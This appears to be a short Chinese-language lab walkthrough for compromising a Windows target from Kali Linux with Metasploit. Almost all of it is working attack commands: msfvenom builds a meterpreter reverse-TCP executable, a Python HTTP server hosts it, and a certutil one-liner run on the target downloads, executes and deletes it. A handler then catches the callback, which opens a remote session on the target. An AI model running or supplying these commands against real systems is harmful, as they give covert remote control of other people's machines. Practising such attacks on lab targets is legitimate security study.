靶机地址:windows 192.168.1.84
攻击者地址:192.168.20.44 kali
在kali当中生成脚本 msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.20.44 lport=7070 -f exe -o /tmp/win.exe
在kali当中,执行 cd /tmp 进入刚刚生成脚本的目录
执行 python -m SimpleHTTPServer 80
去目标机器,也就是靶机*问
访问出现这样的,说明访问成功
下一步:开启监听,在kali服务器上输入 msfconsole命令,进入MSF
等模块加载完成,输入:handler -p windows/meterpreter_reverse_tcp -H 192.168.20.44 -P 7070 (如果报错,就手动输入)
输入完成以后,去靶机上打开cmd 执行:cmd.exe /c "certutil.exe -urlcache -split -f http://192.168.20.44/win.exe &win.exe &del win.exe"
然后就可以看到成功建立连接了
再次执行sessions 看看会话
这时候就多了一条记录,执行 sessions -i 1 就能打开会话,这个时候就进入了对方系统